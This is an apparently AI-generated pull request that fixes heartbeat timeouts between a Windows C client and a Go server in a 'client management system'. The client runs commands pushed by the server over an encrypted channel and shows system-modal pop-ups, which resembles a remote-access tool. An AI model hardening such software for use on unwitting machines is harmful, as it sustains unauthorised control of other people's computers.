### PR TITLE
Fix Heartbeat Timeout Bug in Client Management System

### DIFF
--- a/client/include/utils.h
+++ b/client/include/utils.h
@@ -16,6 +16,7 @@ void str_trim(char* s);
 
 // Networking helper
 void sock_send(SOCKET sock, HANDLE mutex, const char* msg);
+void sock_send_ex(SOCKET sock, HANDLE mutex, const char* type, const char* msg);
 
 // Hybrid Encryption
 #define RSA_PUB_KEY "-----BEGIN PUBLIC KEY-----\n"\

--- a/client/src/main.c
+++ b/client/src/main.c
@@ -35,7 +35,7 @@ void handle_command(void* arg) {
     char* cmd = ca->cmd;
 
     if (strcmp(cmd, "ping") == 0) {
-        sock_send(g_sock, g_send_mutex, "pong");
+        sock_send_ex(g_sock, g_send_mutex, "pong", "");
     } else if (strncmp(cmd, "[msg] ", 6) == 0) {
         MessageBoxA(NULL, cmd + 6, "Message", MB_OK | MB_ICONINFORMATION | MB_SYSTEMMODAL);
         sock_send(g_sock, g_send_mutex, "ok");
@@ -207,7 +207,7 @@ int main() {
                                 cJSON* type = cJSON_GetObjectItem(msg, "type");
                                 cJSON* payload = cJSON_GetObjectItem(msg, "payload");
                                 if (type && strcmp(type->valuestring, "ping") == 0) {
-                                    sock_send(g_sock, g_send_mutex, "pong");
+                                    sock_send_ex(g_sock, g_send_mutex, "pong", "");
                                 } else if (type && strcmp(type->valuestring, "command") == 0 && payload) {
                                     char* cmd_val = payload->valuestring;
 

--- a/client/src/utils.c
+++ b/client/src/utils.c
@@ -81,10 +81,14 @@ void str_trim(char* s) {
 extern SessionKey g_session;
 
 void sock_send(SOCKET sock, HANDLE mutex, const char* msg) {
+    sock_send_ex(sock, mutex, "response", msg);
+}
+
+void sock_send_ex(SOCKET sock, HANDLE mutex, const char* type, const char* msg) {
     if (mutex) WaitForSingleObject(mutex, INFINITE);
 
     cJSON *root = cJSON_CreateObject();
-    cJSON_AddStringToObject(root, "type", "response");
+    cJSON_AddStringToObject(root, "type", type);
     cJSON_AddStringToObject(root, "payload", msg);
     char *json_msg = cJSON_PrintUnformatted(root);
 

--- a/main.go
+++ b/main.go
@@ -581,6 +581,7 @@ func handleTCPClient(conn net.Conn) {
 			log.Printf("[TCP][%s] Message JSON hatası: %v", id, err)
 			continue
 		}
+		client.updatePong()
 
 		switch msg.Type {
 		case "pong":


### PR DESCRIPTION
This change fixes a bug where clients would disconnect due to a heartbeat timeout shortly after connecting. The fix involves two parts:
1. On the server side, the heartbeat timer is now reset whenever any valid, decrypted message is received from the client, not just explicit pongs.
2. On the client side, the heartbeat response has been updated to use the explicit "pong" type expected by the server, rather than the generic "response" type used for command outputs.

These changes ensure more robust connection management while maintaining the integrity of the hybrid encryption system.

---
*PR created automatically by Jules for task [2972421430531653777](https://jules.google.com/task/2972421430531653777) started by @HeadShotXx*